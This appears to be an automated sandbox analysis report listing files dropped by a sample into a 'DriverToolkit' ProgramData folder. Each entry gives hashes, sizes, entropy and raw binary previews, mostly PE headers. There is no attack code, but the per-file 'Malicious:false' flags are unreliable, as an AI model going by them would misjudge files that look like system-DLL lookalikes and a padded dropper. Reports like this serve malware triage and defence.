                    Preview:a\...A.....N.P..m...s...............VEv..2/......s.......m.........A....y...4...>..]........i...~....b.9@bZZ..l!a..>.+... .Y..zC..}..#d.ME.bs.r..."F.Jz..l.<.(...O)....TU.g.S..c.j.A........%.&.w.E.ES....n..*.yj.TV.MW(#z'r(\.h....C.F..Q7..&7|`.f....<.I..,.|'/......b...1J8..u.@..r]{<=_....c......afcJG.@..y.Y....Z.N........hMJ.|.No.I..e.."T...s9.....{...+..&f....N..=.r..,%.Y..f...K..."D..v..j.....@....I.^..q.r .X<L.w....~....K...x../P./ ..../8.n.....(86n...^...|%I.J......F.?. `3..v.7Ri....W.``.7..........f..#....]T].0B.jCDl.;.Q.,A...S...t2...#.qW..9.Q.Y..{.!.......#Q..........,}...].t.8.u..........t4qb.?........n.u.[R|7...Ik..V.......8.GB.I..qu.'...`3..jg....;.b.^.;....{k......o....'.bIQ......^......"-15$.1.>.. ..a`...#i..pGD.3y=.+..`..4q.......U..3.@E...sc.s3../)F..V.O.cv...dm.7....6.y.:r-R..J.q.%[!..c...x...C.#@...l..(....J.@..Os.U!..WZ&a0..|\...r..S.?.O.u.S......;....W...<.1...7.l+E.z#..].......nt.....N..'-v.u..`a..j...i[%.k.uUw..B*../R.

                    C:\ProgramData\ypkiExpertDriverToolkit\icmp.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):3072
                    Entropy (8bit):3.1101219943219247
                    Encrypted:false
                    SSDEEP:
                    MD5:9A29876347A6B7A9FBD942C7181B883D
                    SHA1:50B46E949C943BE0BBD728190EF6F6AF9ABD6885
                    SHA-256:44B8DB2FA33F94746495AC3E0D4A05663C2FD1AF576AD4976FF16C5B4800F5AD
                    SHA-512:3AB4336503EFDFA74277A9CFBD82A2418C7A7D1346B0C8922FA65E2F2AF06E896041C4C6297BD41C15394D44972F7AFE4FA77F4C197F50ADD9A770C8347D812D
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d.....r..........." .........................................................0.......`....`A........................................`................ ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\imageres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.9520924330050353
                    Encrypted:false
                    SSDEEP:
                    MD5:E1BB8739F5E9F22104B65D4C965F7CB9
                    SHA1:4E7A60F6F153607785F751F76EED2984FE2F6C0E
                    SHA-256:6FAA2EEB495B7E3AA5C8727AE704555189C29AF6103818D3B5D35DEE8C33B8A7
                    SHA-512:195A0A975FB52B82E8E98783CC51F9461C90EF6881EBF23C124908AF4CE0CF14F2C091968BF5EB59767182ABDB8EF3D5193059C432C646A2F98E9F69E29ED532
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....{..........." .........................................................0.......'....`A......................................................... ..P...............................T............................................................................rdata..............................@..@.rsrc...P.... ......................@..@......{.........T...T...T.........{.........$.................{.............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...)B.t.y.\.._.^^..G..2N.Dm.....{.............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\imagesp1.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.529211045280737
                    Encrypted:false
                    SSDEEP:
                    MD5:08B119C2DB5ECD2B0B6F502487F3688B
                    SHA1:DEF03A82EE71CF4727A8BA44284B676BECA733A9
                    SHA-256:494B5BE61B561DB063677B15FA0093EFDE12EDB921FB2B6FDE8DB9C50C5C9F47
                    SHA-512:B45581483C3AF08F280E16491890FDBFBD7ED7C3FA62AD5A0ACB10C3530C79221859565D5A8AFB2EEE2F649B83A65CD19ABABE2041E5B11E5F87CE01F67095DA
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...J............" .........................................................0............`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....J..........T...8...8.......J..........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ......@.....}$h...Mm.CE_d.PiY.RJ..........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\iologmsg.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8110499428886677
                    Encrypted:false
                    SSDEEP:
                    MD5:39F3F6991D8BDE8854A35EAEE28174C4
                    SHA1:204B396412EEB02595A175DAE700072C0836B51D
                    SHA-256:B265CF7CD05D4553127745A779FAAD94338E7E5AC1B9042ABC66C1C4B30950FC
                    SHA-512:8CE9756AC95179652B7C814CF6FA9F360AC34CC8FD78C60C242535068F0BD6B48C4A69115F6B4882705048C1ACA638D4092D691A7A24A29F4EFFF471B6DDAACC
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....ymC.........." .........................................................0......._....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....ymC........T...8...8........ymC........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..`....rsrc$02.... ....^.....v3t.u.[..z.kL..!..b.ymC........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\kbdnko.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.266815078169175
                    Encrypted:false
                    SSDEEP:
                    MD5:55FA7F058C61133E7EA3852E3D451AAA
                    SHA1:7D7F763AB7C9CA7CB00EB5BFDDB9C7A71AD3C596
                    SHA-256:E35710CE41C7F7F74BA33870F425CE0334438EFF0FBAE504C417DF0C85B201BA
                    SHA-512:240F14A80ADD5CE2B9C82801803B3D89C6A2B85CB9417558A521295F69B02F6858A2CC5F356A6EB9D434CB43BF069A0CC4F09948EE0E0B1F861F08AA2E4DFFDE
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d................." .........................................................P............`A.........................................-..P............0.......................@......@...T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\lcxjsQevireQrgrpgZnfgregiQevireErcnveCeb.cfg

                    Download File
                    Process:C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:
                    MD5:81051BCC2CF1BEDF378224B0A93E2877
                    SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                    SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                    SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                    Malicious:false
                    Reputation:low
                    Preview:..

                    C:\ProgramData\ypkiExpertDriverToolkit\lltdres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.886375905501327
                    Encrypted:false
                    SSDEEP:
                    MD5:AEFA87D7F5ED0E36F47328E719828B4F
                    SHA1:6D1B5499984837496307992AA4744FA7D630D900
                    SHA-256:4F63D2EE31A9EF6C75A217822B97FDDC489C29F263BA6BF935A480CFC82E9ABC
                    SHA-512:C7889548948C18E7743047BB78BED496A1A9B4ECAC36FB3B3BBBA2CB04159CA70D5FF9FE3691FDDAA490647B72FD8F12E296A1F6B2EC63F9CEBF2D4C215FC4BF
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....{..........." .........................................................0......k.....`.......................................................... ..8...............................8............................................................................rdata..............................@..@.rsrc...8.... ......................@..@......{.........T...8...8.........{.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ......c6....L,,....5..,.*...K...{.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\lpk.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):3072
                    Entropy (8bit):3.4821716958181246
                    Encrypted:false
                    SSDEEP:
                    MD5:210A2FA0F765952FB19B6B40C39415F3
                    SHA1:F3234B698A227ED2D27F49C1B9D849392EE534C7
                    SHA-256:11B3AF96BDF04B11A265DE8B5621FE72DAFFB353AF3D13E73D2C63F9B1764BEC
                    SHA-512:3E4C8DB902C617E96F4162DB8939A6C70DE86092314A6EB157FACF2EA97B756EC825810B49902B76B7C69D4CA4B2D8C77CCDA71B49A31E2012B46A3280C6AC93
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d...B............" .........................................................0......,.....`A........................................p...$............ ..................................p............................................................................rdata..@...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\lz32.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):3072
                    Entropy (8bit):3.440688432449508
                    Encrypted:false
                    SSDEEP:
                    MD5:A244F50C3A6B09E3067AEB839D29484B
                    SHA1:A9B4B0D9F6EAC80F4DF5EED04A830015B132E77E
                    SHA-256:A8F6DD4694023A7C21261C6B453C66885941054CD59E93729C94F320C2CD4FFD
                    SHA-512:2189CE39CF4C56B302C5B9987E35DAE20732903ED8EECD727B899171D3D8493953A36A8665628D8C1241358711BEF1292CC7C0F57E5CDE22481FA6C7A4481DC7
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d...y............." .........................................................0............`A........................................`...`............ ..................................T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-processor-aggregator-events.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):4096
                    Entropy (8bit):3.267229691139355
                    Encrypted:false
                    SSDEEP:
                    MD5:6DE93A5B994578612D56B6F28C3A9FA2
                    SHA1:ABEDFF238120CDE2B516D741084EAC7EBBFA441E
                    SHA-256:26C987340AEDEB79A2EBA6F334E55A0F3A759DAF8714A7063178E4DB62F44EF0
                    SHA-512:B9F938FDB4C9E0C5D43D5CC19AB77563C9575AACFAB67742FD4607BA460C6F7BFD863F44E24BA46498A36BF8A6664451DE37D4FDE88AF82B38092CCFBE165CD5
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....Wy.........." .........................................................0......tx....`.......................................................... ..@...............................8............................................................................rdata..............................@..@.rsrc...@.... ......................@..@......Wy........T...8...8.........Wy........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!..0....rsrc$02.... ....V...:a.G.........j./..\./v...Wy........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\microsoft-windows-storage-tiering-events.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):6144
                    Entropy (8bit):3.4925649848396567
                    Encrypted:false
                    SSDEEP:
                    MD5:58E8CBD053E64539FCD87BD08AB89D1B
                    SHA1:70FA7D97A39CC1610A2D66D8AA227E33F5DC1A36
                    SHA-256:6E71D0BB7FA0F02071460C55433209794F95F81058186142155DE0330915B3C7
                    SHA-512:C4A837C1037C90016B5AB2330C55B24E07BC74909828F438F6C7A1FEC78CE6CA189E8D3C9773093C6052F71764EFE33695B0309A867FDEA02BFE2FF1DAD3A44A
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...L............." .........................................................@......".....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....L...........T...8...8.......L...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!.......rsrc$02.... ...D..7z.b..`..eS.i..n...bL...........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\mmres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):3584
                    Entropy (8bit):3.918186772218828
                    Encrypted:false
                    SSDEEP:
                    MD5:B915D33B4E55C253615673D063B1CC7E
                    SHA1:4D2FD955CD697D78C19AD56FC4CAAB6BFE62769A
                    SHA-256:169B9CE6933F080341A9B3A107627F376A1E0CB229112DBD36B30D61D6CF2E44
                    SHA-512:F94D34C8BC9B9F14945F0125EC85A74C4E5EDAA20CC4B64FD6CC8F1C34E1B90E8F4F37E926FD9E7C1F3F6602B38CC532B78B7E80CABA306C4AB67E400570AF2D
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d................." .........................................................0......U.....`.......................................................... ..0...............................8............................................................................rdata..............................@..@.rsrc...0.... ......................@..@................T...8...8...................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..@....rsrc$02.... ...-rTu........j_Q..Q:...T................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\moricons.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.5904270142343804
                    Encrypted:false
                    SSDEEP:
                    MD5:D06109B78A02CC8CE0D985BBF6BB0944
                    SHA1:3A4CD66421092FAAB47CC9C3A38BD883F98FBFB3
                    SHA-256:C0B2CFEE062DE6CD55DB9478DEF456855F8BEB2E7E7FEC8103EE6016DFFB203D
                    SHA-512:AB4208687D1B91235F7493C20A3134CCA12D32198F4F18C9E3923BA3960523BDA5EFE082294773F1F0A47E31FDCDD9B1C8EAF6FE859DECE18C8B969F4D376B73
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d......-.........." .........................................................0...........`.......................................................... ..(...............................8............................................................................rdata..............................@..@.rsrc...(.... ......................@..@.......-........T...8...8..........-........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ....zW.u...?.8..bd}W(..5s.Q.>X...-........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\msafd.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):3072
                    Entropy (8bit):2.5650052048493546
                    Encrypted:false
                    SSDEEP:
                    MD5:B11857C2050F4D10731EE0B481176A85
                    SHA1:59BF64486FE96C3454B9D974D717D33F2AD6543C
                    SHA-256:C758A6A9448F739BE478D3DBF1A84ABF9ECE53B94D5B82C68E8EA222CCF1892F
                    SHA-512:545F5E142AF274730065C9C92680E05263E26EC5D3F1C6C3C6336E6D981F046F848D32129A34764CDB76FF96B72165CD19457CF119709168934F0A2B9BE94872
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d...l.A..........." .........................................................0............`A........................................`...\............ ..(...............................T............................................................................rdata..h...........................@..@.rsrc...(.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\msidntld.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):5120
                    Entropy (8bit):3.395111933809935
                    Encrypted:false
                    SSDEEP:
                    MD5:504E51418D856D664DB23DD55A61352D
                    SHA1:522C0FB1ED2B9594E7A2AAB9481883DA57D8CA23
                    SHA-256:F190E142F402DE460455FF2D1835294A3E118BA74D76AA092AF49372BB9B76F4
                    SHA-512:28BEBB26EEB8BA97FB0AC8CC4869576D3CC58CD7C0FDCE988F6FE160C7B426C2A3906799CA021A65A26394CBA266DFA3D3E58790EC41C7EB7ECD0FBD89D6E0DB
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...sG.".........." .........................................................0......c.....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....sG."........T...8...8.......sG."........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... .....R...4."..n3..C}..dP..;....sG."........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\msprivs.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8448181825087704
                    Encrypted:false
                    SSDEEP:
                    MD5:C478DD12B3C32E27DAE46A3E2DBA5D85
                    SHA1:F3F640CF779C7901ADF55844115F02D8C951675B
                    SHA-256:BCF51507B50E6D367137FDAAA471F5A08DE3B398302B42FDEA02FD7D00A487C7
                    SHA-512:85393456093BF692656616AF62A5D3F59342B03D1899F8AF782C70A08BD77C72809D0514FCA86B047B27047F39ED42DDC4D38A3213561C7C5A8D62CF0E61ED9D
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....4..........." .........................................................0.......k....`.......................................................... ..(...............................8............................................................................rdata..............................@..@.rsrc...(.... ......................@..@.....4.........T...8...8........4.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..x....rsrc$02.... ...~/"M+....6N8a..s.[.R....x.z..4.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\msxml3r.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.829963239399607
                    Encrypted:false
                    SSDEEP:
                    MD5:C6080B638D55B218EF04EB727E36884B
                    SHA1:058A401AF449EFB381A1CFB8C26D443DE0F0070B
                    SHA-256:7F8F4E839A504B9C20854FCB2050FF7CCF142EF9423DB12E9D649365FD475437
                    SHA-512:EEF2B621B82AFF08B0F441DAFC94A4056B4A458C97FF20A2177DCE2F270658E96693A43B1304173FBBCD7552CEAE9CE594338BDE857A1F1A27C3206395230576
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....K#..........." .........................................................0............`A......................................................... ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@.....K#.........T...T...T........K#.........$................K#.............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... .....q..Ca.w.U...."...F5....E.K#.............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\msxml6r.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8295394367394793
                    Encrypted:false
                    SSDEEP:
                    MD5:7993880EA16B77154187B5FBAA32533B
                    SHA1:DC960BF8F3C32A343EA86BDE33C0A4A3359EF675
                    SHA-256:4A4DA495D879DBF9EC902ED6E3A4B77C0EA2738AFE595E3DE195A9354ED3744B
                    SHA-512:D72AACCB5880CC6F65AC51656912B1435DBBEF0DAB1A14D9D06394FC18CFF36BB64EE946AC3454BDB54ED83DEF8813F7473F0CB3472952B3E48B4049B0467B6F
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....K..........." .........................................................0............`A......................................................... ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@.....K.........T...T...T........K.........$................K.............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... ..0....rsrc$02.... ...<~.T.......v{..MI-|..qs.f....K.............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\mxpLHRYdU.exe

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):412135424
                    Entropy (8bit):1.9612866326755067
                    Encrypted:false
                    SSDEEP:
                    MD5:4F2321A7D7EC44F7A6EF21D43CF4D470
                    SHA1:CEC41B2CE33E434CE338FD1DB592AF81915C9A53
                    SHA-256:2DCD988DC3EC468A7180C7875F1D83E894DEDD2DF13751650F770E82FCB213EF
                    SHA-512:A1DF8C21CA623AB634912C54AA175A581E8EBCF4290CE0784FCBB8E2FF58586AFA7D0B1280E604D03AE01DBCD64B26193295731F5D24365047BD6C5F94F43F71
                    Malicious:false
                    Reputation:low
                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....O.e................. ...........2.......@....@..........................@............@......@......................r.... ...g.......p...........................................................................0..........`....................text....z.......|.................. ..`.itext..`........................... ..`.data.......@.......$..............@....bss....|%...............................idata...g... ...h..................@....didata.`...........................@....edata..r............<..............@..@.tls....p................................rdata..]............>..............@..@.rsrc....p.......p...@..............@..@.............@......................@..@........................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\neth.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.809266997655005
                    Encrypted:false
                    SSDEEP:
                    MD5:26BF659DC283CD389BAAD0CA54C1ABCA
                    SHA1:B386C4C9400880EC8315A93AF0C5B38DB6BE9ABD
                    SHA-256:AD2310E7F3BA73C29872A14826F6A5118765A4C6B67A57168A336C05365DD152
                    SHA-512:871449EB6B24A9D13134CA2D45F0839A2A417517969D1C7029219570AAEE932E27026B29987553D41C58C13F265CF2A406442E21DB54A07FB2555392CC4BF19F
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...7..).........." .........................................................0.......8....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....7..)........T...8...8.......7..)........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02.... ......dq.x....c:y.m_a....@....N7..)........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\netmsg.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8835072778565203
                    Encrypted:false
                    SSDEEP:
                    MD5:D06842956E353F0F3DE559BC5CB5313B
                    SHA1:CE2B0D69A6755489FD052632E4A43CC86167E2F4
                    SHA-256:D60D8165A24D4248ADF5A64B60E25797209AE27B12438A765A49334A38BFBC67
                    SHA-512:34FE901863D86CB1A0906B7576212B29C1D4808B9AAFFED1E51578FB5DDB6D27AFCE4E58D6C9C842AFAA581EFDCCEF9A79E94A7EF515D35F0B3E5855E5289D88
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d......1.........." .........................................................0......y.....`A......................................................... ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@.......1........T...T...T..........1........$..................1............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02.... ......=Jr.R...w=..l.|I.....'....1............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\normaliz.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):6144
                    Entropy (8bit):2.0738156878482745
                    Encrypted:false
                    SSDEEP:
                    MD5:FB54AB5E5958922EE6D1ED6EBB2F0822
                    SHA1:C2BF443E83B2DED1120B8061E5D455EF67163F54
                    SHA-256:52542F6C87F56ADACEFA06B5B227F605A438F46B2096CD8C93A720A3482B59EE
                    SHA-512:EC144B2836227945E93026075059097D297CA6938FA66210EB05FE487452C7E9ED8E6F904174AE28C340156821EC2F666EC7BDFBAD5F17A1E0065CE530D3895F
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a.}.a.}.a.}.u.~.`.}.u.y.b.}.u.}.`.}.u...`.}.u...`.}.Richa.}.................PE..d.....'..........." ................................................................ .....`A........................................."..>............`.......@...............p...... !..p............................ ...............................................text...2........................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.00cfg.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\oleaccrc.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):3.4734449038244195
                    Encrypted:false
                    SSDEEP:
                    MD5:B2E8F15407B6E385A80FA084B4E37E0C
                    SHA1:61C1A5ADF4EC0C8D3388C7D94626306F4B6C8530
                    SHA-256:774C253E5D872ACE88D3052D8D4BA64D109015AC55A7CB9E45C06238F5F13363
                    SHA-512:9F5DD2EB0B2D28A589870E5D8BD67DC102A250BA7BCCFADCCD1FAE4B1E75008CB43D4D91D3FD32E62A39FF598D023B3862DB60FE7B5151769209864F2F20B242
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d......].........." .........................................................0......W.....`.......................................................... ..x...............................8............................................................................rdata..............................@..@.rsrc...x.... ......................@..@.......]........T...8...8..........]........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!..h....rsrc$02.... ....|........$.L....S...>p.,.....]........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\onnxruntime.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2832
